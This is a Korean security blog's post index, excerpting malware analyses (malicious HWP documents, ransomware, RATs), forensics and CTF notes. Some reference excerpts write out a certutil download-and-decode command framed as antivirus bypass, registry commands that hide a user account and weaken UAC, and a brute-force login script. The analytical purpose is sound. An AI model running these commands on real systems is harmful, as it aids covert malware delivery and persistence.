hanguk529의 등록된 링크

 hanguk529로 등록된 네이버 블로그 포스트 수는 116건입니다.

c93310b54317e1d458185d2a0aaacd63 [내부링크]

오랜만에 포스팅ㄱㄱ 멀웨어파일을 분석해볼것이다. 오늘 분석파일은 이파일이다. 실행시 보호된 운영체제...

익스플로잇 hwp문서 분석 [내부링크]

요번에 분석하게된 악성프로그램은 한글문서이다. 이번 프로그램은 특정 사건의 제목으로 작성된 한글(.hwp...

160815 net.jse 스크립트 분석 [내부링크]

이샘플은 jse파일이다. PC가 감염되면 USB를 매체로 다른 PC로 이동할수있는 능력을 가지고있다. 1....

160819 eup.cer 인증서 스크립트 분석 [내부링크]

ecp.cer 이라는 인증서모양의 스크립트를 분석 인증서모양의 .cer 파일이다. 메모장으로 열어보면 인증서라...

160929 우리가족.abcd.scr 분석 [내부링크]

인터파크해킹으로 유명한 우리가족.abcd.scr 악성코드를 분석해볼 계획이다. 요번 악성코드는 자세하게 분...

160929 인터파크악성코드-우리가족.abcd.scr 상세분석 [내부링크]

해당 우리가족.abcd.scr 파일은 인터파크해킹에 이용된 악성코드이다. 우리가족.abcd.scr 부터 프로세스 진...

160929 인터파크악성코드-msoia.exe 상세분석 [내부링크]

위파일은 우리가족.abcd.scr 파일에서 파생된 악성코드이다. 이전포스팅에서본것과 같이 해당 악성코드는 ...

160929 인터파크악성코드-ielowutil.exe 상세분석 - 1 [내부링크]

이번 포스팅은 아직 진행중이며, 아직 분석이 덜끝났지만, 먼제 포스팅해놓았다. 통신부분을 추가분석후 포...

160929 인터파크악성코드-ielowutil.exe 상세분석 - 2 [내부링크]

160929 인터파크악성코드-ielowutil.exe 상세분석 - 1 포스팅에 이어서 ielowuil.exe의 통신부분을 분석 해...

161004_한글 취약점 악성코드 ( .hwp) [내부링크]

요번 분석은 .hwp 취약점을 이용한 악성코드이다. 이 악성코드는 사용자로 하여금 궁금증을 유발하여 문서...

161025_랜섬웨어( 확장자: .THOR) 간단분석자료 [내부링크]

보통의 랜섬웨어들은 해외에서 온 메일의 첨부파일을 실행하여, 랜섬웨어에 감염된다. 해당 랜섬웨어는 감...

161103_ 멀버타이징 랜섬웨어 [내부링크]

Malvertising 멀버타이징 공격으로인한 랜섬웨어유포가 진행중이다. 최신영상등을 볼수있는 스트리밍사이...

161104_이메일로온 악성코드 스크립트 [내부링크]

161103, 161104 두번의 외국 메일이 왔었다. 해당 메일은 전에 분석한적이있는 스크립트형태의 랜섬웨어였...

1611110_랜섬웨어(.thor) 난독화된스크립트 [내부링크]

랜섬웨어(thor) 의 스크립트를 분석해보았다. 전에 봤던 스크립트와 다르게 조금 변형된 형태라서 포스팅을...

161122_DAntiKeyLogger 악성코드 분석 [내부링크]

DAntiKeyLogger 이름은 마치 키로거를 방지하는 보안프로그램 같다. 하지만 해당 악성코드는 PC의 정...

161221 cerber랜섬웨어, 광고페이지를이용한 유포 [내부링크]

cerber랜섬웨어가 광고페이지를통해 유포 flash player의 신규취약점을 이용한 유포인지는 확인되지않았다 ...

170105 HWP문서위장한 악성파일 [내부링크]

처음본 경우라 샘플링하여 정보를 저장한다. 요번샘플은 한글문서를 위장하여 사람들에게 실행하게 유도한...

170116_HWP, eps취약점을 이용한 악성코드 분석 [내부링크]

오랜만에 한글 취약점을 이용한 문서를 분석하게되어서 포스팅한다. 이 악성코드는 메일을 통하여 유포되었...

170209 process hollowing기법 cerver랜섬웨어 [내부링크]

Process Hollowing 기법을 이용한 랜섬웨어 분석 포스팅예정  cerber랜섬웨어가 신규로 나왔다 기존...

170209 Process Hollowing기법을 이용한 Cerber 랜섬웨어 [내부링크]

랜섬웨어 포스팅은 잘하지 않지만, 오랜만에 랜섬웨어를 살펴보니 조금 다른 방식으로 작동하여 포스팅한다...

170209 닷넷(.NET) 기반 ‘클릭원스(ClickOnce)’ 배포 악성코드 [내부링크]

요번 샘플은 닷넷 프레임워크 기반 클릭원스(ClickOnce) 배포방식을 이용하는 악성코드이다. 특정 사이트...

170303 cerver 이메일을 통한 감염 [내부링크]

플래쉬 취약점을 이용하여 주로 전파가 되던 cerver랜섬웨어가 이메일의 첨부파일을 통한 감염도 확인되었...

170310_해킹 메일에 첨부된 백도어 악성파일 분석 [내부링크]

해당 파일은 170105 분석했던 HWP문서를 위장한 악성파일을 유포했던 해커가 제작했을것으로 추측된다. ...

170327 한글문서 취약점을 이용한 악성코드 [내부링크]

사칭 이메일을 통한 악성코드 유포 한글취약점, 경유지접속을통한 추가악성코드다운로드, 정보수집및 클라...

170317 이메일 사칭, QR코드를 이용한 악성 APK 유포 [내부링크]

해당 악성 apk는 사칭하여 이메일을 통하여 유포되었다. 아래와 같이 링크들을 클릭하거나 QR코드를 이용...

170410_사칭메일을 이용한 악성 hwp.lnk 유포 [내부링크]

해당 샘플은 지인을 사칭한 메일을 이용하여 악성코드를 감염시키려고했던 샘플이다. 보낸사람을 지인으로 ...

170413_SPORA 랜섬웨어 간단분석 [내부링크]

항상 cerber 랜섬웨어를 봤었는데, 처음으로 SPORA랜섬웨어 샘플이 들어왔다. 이 랜섬웨어의 작동방식...

170414_hwp.lnk 악성파일_ svchost.exe 메모리인젝션 [내부링크]

요즘 자주보이는 hwp.lnk악성파일의 샘플이다. 요번 샘플은 조금 다르다. 기존과는 다르게 svchost.exe에 ...

170419_CVE-2017-0199 취약점을 이용한 악성코드 [내부링크]

지난주에 포스팅하려했던 샘플이다. 일주일이 금방가버려서 이제 포스팅한다. 해당 악성코드는 MS 4월 12...

170506_새로운 유형의 피싱메일(메일본문_악성스크립트삽입) [내부링크]

피싱메일관련포스팅은 잘하지 않지만, 요번 피싱메일은 기존과는 다른 유형이라 기록을 남겨놓는다. 기본의...

한글취약점을 이용한 메모리인젝션악성코드 [내부링크]

알수없는 한글 취약점을 이용한 악성코드분석완료 1.한글문서에 특정쉘코드를 주입 2.정상프로세스에 악성...

170530_HWP BOF취약점을 이용한 메모리인젝션 악성코드 [내부링크]

한글의 특정 BOF취약점을 이용한 한글문서 분석이다. 최근 EPS 취약점을 이용하는 한글문서와는 다른...

170627_svchost.exe에 Process Hollowing기법을 사용하는 악성코드 [내부링크]

170627_svchost.exe에 메모리삽입을 하는 형태의 악성코드 자주 발견되는 샘플이여서 포스팅을 할까말까하...

170714_svchost.exe에 Process Hollowing기법을 사용하는 악성코드 [내부링크]

svchost.exe에 Process Hollowing기법을 사용하는 악성코드 해당악성코드는 HWP파일로 위장한 악성코...

170818_MP3파일위장 악성파일 [내부링크]

170818_MP3파일위장 악성파일 바로가기를 이용하여 숨긴파일인 악성파일을 실행시키는 악성코드 mp3확장...

170920_lnk한글위장 백도어(Process Hollowing기법 [내부링크]

한글파일을 위장한 lnk파일형태의 악성파일이다. 파워쉘을 이용하여 악성스크립트를 다운로드하여 실행시킨...

170927_PlugX RAT 악성코드 분석 [내부링크]

요번샘플은 PlugX RAT 악성코드이다. 분석중 PlugX RAT이 사용하는 XV헤더를 사용하는것으로 ...

171019_doc매크로를 이용한 파워쉘 스크립트 악성코드 [내부링크]

171019_doc매크로를 이용한 파워쉘 스크립트 악성코드 워드문서의 매크로를 이용한 악성코드이다. 정상 워...

171117_lnk 악성파일 분석_원격제어툴 [내부링크]

hwp파일으로 위장하여 악성파일을 실행하도록 유도한다. lnk파일을 실행히 경유지IP로 접속되어 추가 악...

180201_doc 매크로 악성코드 [내부링크]

doc 문서의 매크로를 이용한 악성코드가 발견되었다. 해당 문서를 실행시키도록 유도하기위하여 교묘한 방...

180221_평창 올림픽 악성코드 분석 - 1 [내부링크]

평창 올림픽 악성코드 분석 - 1 분석이 완벽하게 끝나지 않았기 때문에 나눠서 포스팅할 계획이다. 샘플파...

180222_HWP_Exploit 악성코드 분석 [내부링크]

해당 악성코드 샘플은 EPS취약점을 이용한 악성코드이다. 앞서 비슷한 유형의 악성코드가 많았기 때문에...

180306_PDF.EXE_PDF위장 악성코드(수집정보 패킷으로 전송) [내부링크]

180306_PDF.EXE_PDF위장 악성코드(수집정보 패킷으로 전송) 요번 악성코드는 PDF로 위장한 악...

180412 CVE-2017-11882 악성코드 샘플 분석 [내부링크]

CVE-2017-11882 악성코드 샘플 분석 CVE-2017-11882로 등록된 취약점은 문서에 방정식(OLE 오브젝...

180428 CVE-2017-11882 신규 샘플 [내부링크]

CVE-2017-11882 취약점을 이용하는 워드파일중 분석이 쉽지 않은 샘플이 있어서 꾸준하게 분석을 시도하...

180502_GandCrab 랜섬웨어 [내부링크]

180502_GandCrab 랜섬웨어 GandCrab 랜섬웨어 샘플이 확인되어 분석을 진행하였다. 디자이너를 사칭하...

:: 오픈채팅방_악성코드 개설(crack_me_v.3.0 파일 첨부) [내부링크]

소개 :: 악성코드 분석, 정리 :: 서로이웃으로 정보공유! 오픈채팅방_악성코드 https://open.kakao.com/o/g...

180618_악성메일_난독화 JS파일 [내부링크]

180618_악성메일_난독화 JS파일 해당 샘플은 이메일을 통하여 전파되었다. 경유지 URL이 분석당시 접...

180703_하드디스크 파괴(MBR 변조) KillDisk 악성코드 [내부링크]

180703_하드디스크 파괴(MBR 변조) KillDisk 악성코드 하드디스크파괴 악성코드인 KillDisk를 간단...

webscan die [내부링크]

die('hello,peppa!',(string)(123456789*9)); die(md5('PHP')); https://isc.sans.edu/forums/diary/We...

180801_고소장 갠드크랩 v4 [내부링크]

최근 이메일을 통한 랜섬웨어 유포가 있었다. 고소장으로 사용자가 클릭을 하도록 유도한다. 사용자가 이메...

180914_ppt.exe파일(conhost.exe C&C서버 악성코드) [내부링크]

180914_ppt.exe파일(conhost.exe C&C서버 악성코드) 해당 악성코드는 ppt파일로 위장하여 사용자가 ...

180917_EPS 취약점을 이용한 악성코드 [2018년도 국정감사계획서-수정(안).hwp] 분석 [내부링크]

해당 악성코드는 EPS취약점으로 악성코드를 감염시키는 형태의 악성파일이다. 다운로드된 해당 한글문서...

180928_한글 EPS 취약점 악성코드(클라우드 서비스) - 1 [내부링크]

180928_한글 EPS 취약점 악성코드(클라우드 서비스) - 1 이메일을 통해 유포한 악성 한글문서이다. 해당...

180928_한글 EPS 취약점 악성코드(클라우드 서비스) - 2 [내부링크]

180928_한글 EPS 취약점 악성코드(클라우드 서비스) - 2 해당샘플들은 180928_한글 EPS 취약점 악성...

181003_한글lnk악성코드 분석(기존 분석 샘플_정리버전) [내부링크]

기존 분석했던 샘플을 정리하여 다시 포스팅하였다. 170920_lnk한글위장 백도어(Process Hollowing기법 ...

181130_악성HWP(BOF취약점)_GoldDragon.com [내부링크]

오늘 포스팅은 김수키(Kimsuky) 해킹조직의 악성코드로 추측되는 샘플이다. 분석중 GoldDragon.com의 문...

181219 LNK 악성파일 (vbs 스크립트) [내부링크]

해당파일은 houdini(H-worm) 악성스크립트이다. 자세한 분석 보고서는 다른 분이 자세하게 분석해놓은 분...

181213_한글 EPS를 악용한 악성코드(클라우드 서비스) [내부링크]

요번샘플은 기존에 분석한적이 있던 악성코드의 또 다른 버전이다. 해당 샘플은 아래와같다. https://blog....

181229_악성HWP(BOF취약점)_GoldDragon.com_정리버전 [내부링크]

181130_악성HWP(BOF취약점)_GoldDragon.com 포스팅을 재정리하여 포스팅하였다.기존과 스크린샷은 ...

더미다(Themida) 악성코드 [내부링크]

더미다(Themida)로 패킹된 악성코드가 확인되었다. 해당 악성코드는 가상환경을 탐지하며, 분석도구를 탐...

190103_HncCheck.dll 악성코드(daum mail이용) [내부링크]

이번 악성코드는 APT공격에 사용된 악성코드이다. 한글문서로 위장하여 사용자가 실행하도록 유도하였다...

190213_숨긴 시트를 이용한 엑셀 악성코드(인보이스 RAT) [내부링크]

190213_숨긴 시트를 이용한 엑셀 악성코드(인보이스 RAT) 해당 악성코드는 메일을 통하여 유포되었다. ...

190220_Gandcrab v5.1 복구 툴 공개 [내부링크]

갠드크랩 5.1v 복구가 가능 한 툴이 공개되었다. 해당 파일은 아래 한국랜섬웨어침해 대응 센터에서 확인할...

190131_이력서 위장 랜섬웨어(Gandcrab 5.1v) [내부링크]

해당 랜섬웨어를 간단하게 분석해보았다.포스팅은 추후 작성할 예정이다. 분석중 경유지 url을 확인했는데,...

190319_갠드크랩 v5.2(word 매크로) [내부링크]

190319_갠드크랩5.2(word 매크로) 최근 수집된 갠드크랩 v5.2 샘플이다. 이메일을 통해 유포되는 갠드크랩 ...

210820_EXCEL oLe10NAtIVE 분석 [내부링크]

해당 샘플(25DBF1548786BCF7AD80314F4B282FCA)은 엑셀문서이다. 평범한 악성 엑셀문서처럼 매...

20201216_로키봇(Lokibot) [내부링크]

이름: 43CyThvrR7All4p.exe 크기: 854528 바이트 (834 KiB) CRC32: B2ECEB6E CRC64: D2432EF77491D1DD SHA256: 81560D06EDA75455260687223087F29F54C1A95D2B4E51ED4F3801E3D948CDBA SHA1: 9AF1D6F86678676BA18473DF401E5CB97DC6D848 BLAKE2sp: C293862ACAE1043ED83E2CD9C19A506FF2557AE85E5DAF2973DC353C4650B475 이름: NT1.dll크기: 51200 바이트 (50 KiB)CRC32: 564824C5CRC64: 2277B408F05B981FSHA256: 42711F86BFAEAA348A35687BBE78E24D27E64C28CB8D49723CBB76A297F1A1EBSHA1: 9DEE4F6D52C84B0E983D44F45B0C9CB3EDBC9C3FBLAKE2sp: A874081BA2EEF968923CEA195ABA128F9ECC504758140E6074E7CD2572D3E585 이름: GlaxoSmithKline.dll크기: 217088 .......

201218_레지스트리 참고 [내부링크]

<윈도우 사용자계정 숨기는 방법> REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v [사용자명] /t REG_DWORD /d 0 /f <UAC (사용자 액세스 제어) 원격 제한을 비활성화> reg ADD HKLM\Software\Microsoft\windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f -> 왜 원격제한을 비활성화 하는가? - 기본 제공 관리자 (RID 500) 계정에 대해 UAC 토큰 필터링 (관리자 승인 모드)을 적용하게 됨 - UAC bypass 기법으로 사용됨

CertUtil.exe을 이용한 백신 우회 [내부링크]

원격 URL을 통해 파일을 로컬로 저장가능 certutil.exe -urlcache -split -f [URL] output.file C:\Temp>certutil.exe -urlcache -split -f "hxxps://text.com/text.txt" bad.txt C:\Temp>certutil.exe -decode bad.txt bad.exe https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/

MSI 분석 [내부링크]

다운로드 https://www.jsware.net/jsware/msicode.php5#unpackx jsMSIx.exe 를 사용하여 msi 파일 분석

Azure Security Center [내부링크]

Azure Security Center 보안 경고 - 참조 가이드 MITRE ATT&CK 행렬의 버전 7과 일치하는 Azure Security Center 킬 체인을 설명하는 테이블 해당 페이지에서 커맨드 명령 검색 해보면 도움될듯 pcalua.exe: 프로그램 설치 또는 실행 중에 호환성 문제를 감지하는 Microsoft Windows "프로그램 호환성 관리자"의 구성 요소입니다. https://docs.microsoft.com/ko-kr/azure/security-center/alerts-reference

200514_구로더(GuLoader) 안티디버깅(AntiVM) 기법 [내부링크]

200514_구로더(GuLoader) 간단 정리 요즘 귀찮게 하는 악성코드인 구로더(GuLoader)이다. 안티디버깅 기법 우회했던걸 정리하기 위해 포스팅한다. 참고한 블로그(해외링크 주의) https://blog.vincss.net/2020/05/re014-guloader-antivm-techniques.html https://www.anquanke.com/post/id/204839 해당 루틴은은 메모리 0x10000 ~ 0x7FFFF000 범위에서 가상환경과 관련된 문자열을 체크한다. 문자열은 암호화되어 있으며, 문자열을 무력화시켜 우회가능하다. [가상환경탐지 문자열] 0xB314751D 0xA7C53F01 0x7F21185B 0x3E17ADE6 0xF21FD920 0x27AA3188 0xDFCB8F12 0x2D9CC76C CreateFileA 함수를 통해 가상환경과 관련된 특정 파일이 존재하는지.......

WMI 를 이용한 악성코드 실행 참고 [내부링크]

[WMI 를 이용한 악성코드 실행 참고] EventFilter 조회: Get-WMIObject -Namespace root\Subscription -Class __EventFilter EventConsumer 조회: Get-WMIObject -Namespace root\Subscription -Class __EventConsumer FilterToConsumerBinding 객체 조회: Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding EventFilter 제거: Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='Filter_Name'" | Remove-WmiObject -Verbose EventConsumer 제거: Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='Consumer_Name'" | Remove-WmiObject -V.......

200723_Detecting & Removing an Attacker's WMI Persistence [내부링크]

200723_Detecting & Removing an Attacker's WMI Persistence WMI 에 등록된 필터를 확인하기 위해 만든 스크립트이다. 파워쉘 스크립트 bypass를 위해 배치파일을 이용해서 파워쉐를 실행하였다. 1번 메뉴를 이용해 등록된 WMI 필터정보를 확인하고, 2번 메뉴를 통해 등록된 필터를 삭제한다. # 1번 메뉴로 WMI필터정보를 확인할 때 문자열을 입력받아 현 디렉토리에 IP정보를 포함한 파일명으로 저장한다. (지금 소스는 해당PC의 IP를 고유문자열로 사용했다.) ## WMI_Security_Script.bat ## _main_source_code(WMI Persistence).ps1

20200823 커널 디버깅 세팅 [내부링크]

로컬 windbg와 호스트 vm을 연결하여 커널디버깅 세팅을 함 !process 0 0 을 이용하여 vm에서 실행한 procexp.exe를 확인 가능

200823_.sys 파일 Windbg 분석 [내부링크]

200823_.sys 파일 Windbg 분석 vm과 windbg연결은 포함하지 않았음 reversing.kr의 WindowsKernel 문제 샘플로 시작 kd> sxe ld WinKer.sys - sys 로드지점에 예외, 정상적으로 sys가 로드되면 cc 걸림 - set exception break when [module] load kd> lm - cc걸렸을때 lm을 이용하여 sys가 올라와있는지 확인 kd> u A59D503E - start address(a59d1000) + Entry Point(403E) kd> bp a59d5040 ## 참고 POB가 있을경우 아래와 같이 bp 가능 kd> bp WinKer!DriverEntry a59d5040 에서 멈춤 디버깅 참고: https://wendys.tistory.com/27 PDB의 유무 참고: https://banananmilk.tistory.com/21

데이터 수집 참고 [내부링크]

#휘발성 데이터수집참고 http://portable-forensics.blogspot.com/2014/08/volatile-data-acquisition.html http://www.parkjonghyuk.net/lecture/2011-2nd-lecture/computersecurity/chap06.pdf #volatility 정보 https://ss-spring.tistory.com/17 #비휘발성 데이터수집참고 http://portable-forensics.blogspot.com/2014/09/non-volatile-selective-acquisition.html #슈퍼패치 관련 http://forensic-proof.com/archives/6599 forensic-proof.com_(FP)프리,슈퍼 패치 포렌식(Prefetch & Superfetch Forensics).pdf <FTK Imager> #FTK Imager https://k-dfc.tistory.com/34 # 수집도구 정리 http://forensic-proof.com/tools #VM탐지.......

201207_xls VBA 코드 악성코드 [내부링크]

오랜만에 hybrid-analysis에서 샘플을 받아 분석함 파일을 살펴보니, Revenge RAT 악성코드로 확인됨 <공격자 특징> 1. 공격자는 리버스코드를 좋아하는 사람이였음 2. DownTownGoldy 문자열을 치환용도로 사용함 3. top4top.io 도메인을 사용함 4. Microsoft Visual C# / Basic .NET 사용함 <파일정보> 이름: malware.xls 크기: 229376 바이트 (224 KiB) CRC32: 2DDEC48A CRC64: C3AF85741C155D26 SHA256: CDE8C022AA6E79207F788F05070F4E6FE80A4EC3A76D566A52EEAF72542B34F3 SHA1: D2D02A0819090FC7B9767C4A9B0A9BDBD29679AE BLAKE2sp: 4519E7BEE591A8C61CD16508958AAEC788ABFF3753989E70D3566587B5EB2488 hxxps://h.top4top.io/pn.......

CNN(Convolutional Neural Network) [내부링크]

합성곱 신경망(Convolutional Neural Network, CNN)CNN이 거의 기본 베이스인것 같음 https://ko.wikipedia.org/wiki/%EB%94%A5_%EB%9F%AC%EB%8B%9D http://taewan.kim/post/cnn/

201213_pythonchallenge.com [내부링크]

파이썬 공부하며 풀수있는 문제들이라는데, 공부할겸 ㄱㄱ 편한 모듈을 잘 모르니, 그냥 대충 아는 함수로 코드가 간결하지 못하게 푸는 경우가 생김 문제 풀때마다 다른사람들은 어떻게 풀었는지 봐야겠음 =============================================== http://www.pythonchallenge.com/pc/def/hockey.html http://www.pythonchallenge.com/pc/return/bull.html http://www.pythonchallenge.com/pc/return/5808.html

python3 에서 문자열 치환함수(maketrans)사용 [내부링크]

word = "문자열" table = "".maketrans("치환1", "치환2") print(word.translate(table))

python3 request.urlopen(url) [내부링크]

import urllib.request import time key=' ' for i in range(1,400,1): print("key: "+str(key)) url=str('URL address'+str(key)) with urllib.request.urlopen(url) as response: html = response.read() key=str(html[-5:]) key=int(key[2:-1]) print(html)

파이썬 이미지에 좌표(홀,홀)과 (짝,짝) 제외해서 이미지 생성 [내부링크]

이미지에 좌표(홀,홀)과 (짝,짝) 제외해서 이미지 생성 import numpy as np from PIL import Image img = Image.open('dir\\a.jpg') img2 = Image.open('dir\\un_a.jpg') pix = np.array(img) newData = [] for i in range(640): for j in range(480): if (i%2==0 and j%2==0) or (i%2==1 and j%2==1): continue else: img2.putpixel((i,j), img.getpixel((i,j))) img2.save('dir\\un_a.jpg')

191018_엑셀매크로 악성코드(wsus_Ammyy RAT) [내부링크]

191018_엑셀매크로 악성코드(wsus) 오랜만에 포스팅, 요즘은 자신을 돌아보는 시간을 가지고 있다. 해당 샘플은 Ammyy RAT을 다운로드를 시도하는 것으로 추측된다.(매크로를 사용한다는 점과 경유지 URL에 wsus가 들어간다는 점으로 그냥 추측만 해봄) 엑셀에서 보안경고가 발생하며, 콘텐츠 사용을 누를 경우 악의적인 매크로가 실행된다. 공격자는 사용자가 콘텐츠 사용을 누르도록 유도하기위한 내용을 넣어두었다. 요번샘플은 독특하게 아래와같은 창을 띄운다. 이 폼을 실행시켜놔서 엑셀 내 메뉴들을 이용할 수 없다. 사용자는 아래 창이 완료될때까지 기다리겠지만, 해당 폼은 완료되지 않는다. 악의적인 매크로 소스의 주요 부분이다. 간.......

[http://suninatas.com/] 8번문제 [내부링크]

<!-- Hint : Login 'admin' Password in 0~9999 --> import requests url="http://suninatas.com/challenge/web08/web08.asp" pw = 0 for pw in range(0,9999): restponse = requests.post(url, data={'id': 'admin', 'pw': pw}) if 'Password Incorrect!' in restponse.text: print(pw) else: break print(restponse.text)

191226_악의적인 OLE개체가 삽입된 워드문서(mismyou) [내부링크]

기존에 확인된 공격자와 같은 암호화루틴을 사용하는 악성코드이다. 해당 공격은 아래와 같다. 기존에 확인된 샘플은 PDF.EXE로 PDF문서로 위장하여 사용자가 파일을 실행하도록 했는데, 요번 샘플은 워드문서에 악의적인 데이터를 삽입하여 공격을 시도했다. 공격자는 사용자가 정상적인 파일이라고 생각하도록 업무에 관련된 워드문서를 이용하였다. 워드문서에는 아래와 같이 8.t라는 OLE 오브젝트가 존재하는것을 확인할 수있다. 8.t 파일에는 Office 추가 기능 파일(.wll)이 포함되어 있으며, 해당 intel.wll파일에는 악의적인 데이터가 포함되어 있다. 8.t 악성파일(intel.wll 모듈) 8.t 파일을 분석하다보면, intel.wll모듈을 불러오며 악.......

191219_사용자 정보 수집용 PDF.EXE(ckav.ru) [내부링크]

해당 악성코드는 견적서를 사칭하여 사용자가 파일 실행을 하도록 유도한다. 파일명을 pdf.exe로 만들어서 확장자가 보이도록 설정하지 않은 사용자들은 pdf파일으로 착각할 수 있다. ckav.ru 라는 문자열을 확인 할 수있는 공격자의 악성코드이며, 해당 악성코드는 유저 이름, 컴퓨터 이름, 운영체제 정보 등의 시스템 정보, FTP 프로그램과 웹 브라우저에 저장된 계정 정보를 전송하는 기능을 가진다. 특정 기관을 사칭하여 사용자가 첨부파일을 열어보도록 유도하였다. [PDF.EXE 악성파일] 해당 악성파일은 패킹되어있으며, 특정 루틴을 통해 복호화된다. 해당 악성코드는 백신 탐지, 가상웨어 탐지, 디버거 탐지 등 여러가지 분석 방해 기법.......

200128_중국 지식인들의 북한 관을 살펴보면서.hwp_악성코드 [내부링크]

200128_중국 지식인들의 북한 관을 살펴보면서.hwp_악성코드 해당 샘플은 CVE-2017-8291 취약점을 이용한 악성 HWP파일이다. 해당 파일은 제작할때 실수를 하였는지, 정상적으로 본문내용이 로드되지 않았다. 대신 악성데이터를 가진 EPS는 정상작동하였다. 한글문서가 실행되면서, 악성데이터가 담긴 EPS개체가 로드된다. 해당 eps파일 개체에는 암호화된 쉘코드가 담겨있다. EPS개체에 담긴 암호화된 악성데이터를 복호화해보면 아래와같이 쉘코드를 확인 할 수 있다. 해당 쉘코드는 scdbg 도구를 이용하여 간단하게 확인해 보았다. 확인된 경유지URL은 분석당시 연결되지 않아 추가로 받아지는 악성코드는 수집할 수 없었다. 경유지URL: hxxp:.......

밑바닥부터 시작하는 딥러닝: ㄱㄱ [내부링크]

http://www.hanbit.co.kr/store/books/look.php?p_code=B8475831198 직접 구현하고 움직여보며 익히는 가장 쉬운 딥러닝 입문서 이 책은 라이브러리나 프레임워크에 의존하지 않고, 딥러닝의 핵심을 ‘밑바닥부터’ 직접 만들어보며 즐겁게 배울 수 있는 본격 딥러닝 입문서입니다. 술술 읽힐 만큼 쉽게 설명하였고, 역전파처럼 어려운 내용은 ‘계산 그래프’ 기법으로 시각적으로 풀이했습니다. 무엇보다 작동하는 코드가 있어 직접 돌려보고 요리조리 수정해보면 어려운 이론도 명확하게 이해할 수 있습니다. 딥러닝에 새롭게 입문하려는 분과 기초를 다시금 정리하고 싶은 현업 연구자와 개발자에게 최고의 책이 될 것입니다. 누구를 위한.......

200206_EPS 한글 악성코드(HimTrayIcon.exe, HncCommTCP.exe 체크)_1 [내부링크]

200206_EPS 한글 악성코드(HimTrayIcon.exe, HncCommTCP.exe 체크) - 200228 재분석 완료하였으며, 다음 포스팅 글에 이어서 작성할 예정 해당 악성코드는 한글 파일 내에 삽입된 PS 개체의 취약점을 이용하여, 해당 문서를 열 경우 임의의 코드가 실행 가능하도록 하며, 이후 사용자 시스템의 정보수집 및 추가 악의적인 기능을 수행한다. 메일에 첨부된 압축파일에는 한글 문서가 존재하며, HWP파일은 EPS 취약점을 이용한 문서파일로 제작되었으며, 사용자로 하여금 감염사실을 인지하지 못하도록 아래와 같이 한글문서 실행화면을 보여준다. 해당 악성 한글 문서가 실행되면 한글 문서 내에서 처리하는 이미지 파일 및 미디어 개체가 포함되.......

200218_Gh0st_RAT[\x00\x00\x78\x9c]_msdtc.exe [내부링크]

해당 악성코드는 실행 시 특정 경로에 자신을 복사해 놓으며, 사용자가 컴퓨터를 재부팅을 해도 동작하도록 시작프로그램에 등록한다. 정보수집 및 추가 악의적인 기능을 수행하는 원격관리도구 악성코드이다. 악성 파일(msdtc.exe)은 실행될 경우 특정 경로에 자신을 복사한다. - 복사 경로: C:\Programdata\msdtc.exe 재부팅 후에도 악성행위를 하기 위해 시작프로그램에 등록한다. 악성파일(msdtc.exe)이 실행이 되면 VBS스크립트를 통해 자신을 삭제한다. - 악성파일 경로: C:\Programdata\msdtc.exe - VBS파일 경로: %TEMP%\[랜덤문자열].vbs 해당 악성파일은 사용자 PC의 호스트명, PC 환경설정 및 상태 정보를 수집한다. 해당 악성파일은.......

200206_EPS 한글 악성코드(HimTrayIcon.exe, HncCommTCP.exe 체크)_2 [내부링크]

200206_EPS 한글 악성코드(HimTrayIcon.exe, HncCommTCP.exe 체크)_1 1번 포스팅의 내용을 요약하면 아래와 같으며 이후 과정에 대해 2번 포스팅으로 작성할 것이다. 1) HWP EPS개체 취약점으로 쉘코드 실행 2) 쉘코드에 의해 정상적인 프로세스(HimTrayIcon.exe 또는 HncCommTCP.exe 또는 cmd.exe)에 악의적인 데이터 삽입 2. 악의적인 데이터가 삽입된 정상적인 프로세스 분석 (HimTrayIcon.exe 또는 HncCommTCP.exe 또는 cmd.exe) 악의적인 데이터가 삽입된 정상프로세스는 추가 악성행위를 하기위해 또 다른 정상프로세스(userinit.exe)를 실행시킨다. 그리고 WriteProcessMemory 함수를 이용한 메모리 인젝션 후 ResumeThread 함수로 재실행.......

161108_우려되는대한민국.hwp_1 [내부링크]

161108_우려되는대한민국.hwp_1 16년도 악성코드인 우려되는 대한민국.hwp 이다. 최종적으로 악성행위를 하는 파일은 현재 경유지URL이 연결되지 않아 분석이 불가능하였다. 샘플을 구하게되면 추가로 포스팅을 할 예정이다. 관련기사: 우려되는 대한민국.hwp 파일의 본문이다. 정상적인 한글 문서로 보이지만, 악의적인 EPS개체가 삽입되어있는 악성파일이다. 본문의 하단 부분에 EPS개체가 삽입되어있으며, 개체가 로드되면서 악의적인 공격코드가 실행된다. EPS개체의 데이터는 아래와 같다. BOF가 발생하는 부분은 자세하게 보지 않았지만, 반복되는 0xB5에의해 BOF가 발생했을것으로 보인다. 더미코드 아래에 쉘코드가 있는것이 확인되었다.......

20200321_formbook 악성코드 분석_진행중 [내부링크]

20200321_formbook 악성코드 분석 분석 진행중. 최종 악성행위를 하는 PE파일은 분석에 시간이 좀 걸릴것 같음. 메일로 유포 정상프로세스(RegAsm.exe)를 실행하여 악의적인 데이터를 삽입하여 악성행위 악의적인 데이터가 삽입된 Regasm.exe는 구글드라이브 서비스를 이용하여 추가 파일 다운로드 시도 internetreadfile 함수로 데이터 다운로드 받아온 데이터 복호화 루틴 복호화이후 추가 악성PE데이터 확인됨 최종 페이로드로 악성행위를 하는것으로 추측됨 분석진행중.

휴식 [내부링크]

포스팅은 당분간 쉽니다.

190523_ISO악성코드(PDF.EXE)-Remcos RAT(v2.4.5 pro) [내부링크]

